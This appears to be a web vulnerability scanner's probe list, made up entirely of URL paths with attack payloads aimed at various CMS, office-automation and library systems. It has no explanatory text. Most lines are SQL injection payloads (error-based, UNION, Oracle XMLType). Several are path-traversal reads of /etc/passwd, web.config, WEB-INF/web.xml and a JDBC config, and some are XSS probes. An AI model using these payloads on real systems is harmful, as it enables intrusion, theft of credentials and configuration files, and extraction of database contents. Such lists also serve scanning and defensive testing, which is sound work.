/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
